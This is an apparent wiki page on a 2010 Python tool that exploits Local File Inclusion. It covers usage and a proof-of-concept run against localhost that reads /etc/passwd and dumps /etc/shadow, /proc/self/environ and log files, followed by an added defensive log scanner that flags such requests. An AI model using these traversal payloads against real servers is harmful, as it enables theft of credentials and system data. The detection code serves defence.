From aldeid


Simple Local File Inclusion Exploiter is a Python script that identifies whether a page is vulnerable to Local File Inclusion (LFI) attacks.


$ mkdir -p /pentest/web/lfi-sploiter/
$ cd /pentest/web/lfi-sploiter/
$ wget
$ mv



$ python \
--exploit-url="<http://url>" \


Both options are mandatory:

URL to exploit (e.g. --exploit-url="")
Name of the parameter to exploit (e.g. --vulnerable-parameter="page")


The following example is a proof of concept run against a specific piece of vulnerable code, which you can download here.

$ python --exploit-url="http://localhost/poc/LFI/index.php?page=1" \

Simple Local File Inclusion Exploiter
by Valentin Hoebel (valentin ( a t ) xenuser ( d o t ) org)

Version 1.0 (21th November 2010)  ^__^
                                  (__)\        )\/\ 
                                      ||----w |
Power to teh cows!                    ||     ||

[i] Provided URL to exploit: http://localhost/poc/LFI/index.php?page=1
[i] Provided vulnerable parameter: page

[i] Assuming the provided data was correct.
[i] Trying to establish a connection with a random user agent...
[i] Connected to target! URL seems to be valid.
[i] Jumping to the exploit feature.

[i] For exploiting the LFI vulnerability we need to split the URL into its parts.
[i] IP address / domain: localhost
[i] Script: /poc/LFI/index.php
[i] URL query string: page=1

[i] It seems that the URL contains at least one parameter.
[i] Trying to find also other parameters...
[i] No other parameters were found.
[i] The following 1 parameter(s) was/were found:
[i] {'page': '1'}

[i] According to you, the vulnerable parameter should be: page
[i] Checking if this parameter exists in the provided URL...
[i] Found your vulnerable parameter in the URL.

[i] Now trying to find out how this LFI vulnerability can be exploited...
[i] This can take a while.
[+] Found signs of a successfull LFI vulnerability! No nullbyte was required.
[+] URL: http://localhost/poc/LFI/index.php?page=/etc/passwd

[i] Exploiting the LFI vulnerability starts right now.
[i] Trying to dump some interesting files to your local hard disk...
[+] Dumping file: /etc/passwd
[+] Dumping file: /proc/self/environ
[+] Dumping file: /var/log/apache2/access.log
[+] Dumping file: /var/log/apache2/error.log
[+] Dumping file: /etc/shadow
[+] Dumping file: /etc/group
[+] Dumping file: /var/log/auth.log
[+] Dumping file: /proc/self/status
[+] Dumping file: /proc/self/mounts
[+] Dumping file: /proc/cpuinfo
[+] Dumping file: /proc/meminfo
[i] Hint: The files are also dumped when we have no permission to view them.
[i] Instead of the file, the PHP error message will be dumped.

[i] Completed the task. Will now exit!
[i] I know, there is more about LFI than it is covered here, but this will be implemented in later versions of this tool.
[i] Feel free to send in some feedback!
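
A defensive counterpart to the run above, as an added example that is not part of the original page or of the tool: it scans Apache access-log lines for query parameters that resolve to one of the files the tool lists as dumped. The log lines, the function names and the threshold of three distinct files are assumptions; normalising percent-encoding and relative path forms goes beyond the single case shown in the output.

```python
import posixpath
import re
from urllib.parse import parse_qsl, urlsplit

# Files the tool reports dumping in the run shown above.
DUMPED_FILES = {
    "/etc/passwd", "/proc/self/environ", "/var/log/apache2/access.log",
    "/var/log/apache2/error.log", "/etc/shadow", "/etc/group",
    "/var/log/auth.log", "/proc/self/status", "/proc/self/mounts",
    "/proc/cpuinfo", "/proc/meminfo",
}

# Apache combined log format: client, timestamp, method, request target, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')

# Constructed sample log lines (not captured from a real server).
SAMPLE_LOG = """\
127.0.0.1 - - [21/Nov/2010:10:00:01 +0100] "GET /poc/LFI/index.php?page=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
127.0.0.1 - - [21/Nov/2010:10:00:02 +0100] "GET /poc/LFI/index.php?page=/etc/passwd HTTP/1.1" 200 1843 "-" "Mozilla/5.0"
127.0.0.1 - - [21/Nov/2010:10:00:03 +0100] "GET /poc/LFI/index.php?page=%2Fproc%2Fself%2Fenviron%00 HTTP/1.1" 200 230 "-" "Opera/9.80"
127.0.0.1 - - [21/Nov/2010:10:00:04 +0100] "GET /poc/LFI/index.php?page=/etc/shadow HTTP/1.1" 200 310 "-" "Mozilla/4.0"
"""

def lfi_hits(line):
    """Return (client, parameter, file, status) for each parameter naming a listed file."""
    m = LOG_RE.match(line)
    if not m:
        return []
    client, _method, target, status = m.groups()
    hits = []
    # parse_qsl percent-decodes, so %2Fetc%2Fpasswd and a %00 suffix are normalised.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = value.split("\x00", 1)[0]  # drop anything after a null byte
        path = posixpath.normpath("/" + value.lstrip("/"))
        if path in DUMPED_FILES:
            # Status is recorded but proves nothing: the tool's own hint says a
            # PHP error message is returned when the file cannot be read.
            hits.append((client, name, path, int(status)))
    return hits

def scan(log_text, threshold=3):
    """Return {client: sorted files} for clients requesting >= threshold listed files."""
    seen = {}
    for line in log_text.splitlines():
        for client, _name, path, _status in lfi_hits(line):
            seen.setdefault(client, set()).add(path)
    return {c: sorted(p) for c, p in seen.items() if len(p) >= threshold}

if __name__ == "__main__":
    for client, files in scan(SAMPLE_LOG).items():
        print(client, files)
```

The tool states that it connects with a random user agent, so the check keys on the client address and the requested files rather than on the User-Agent field.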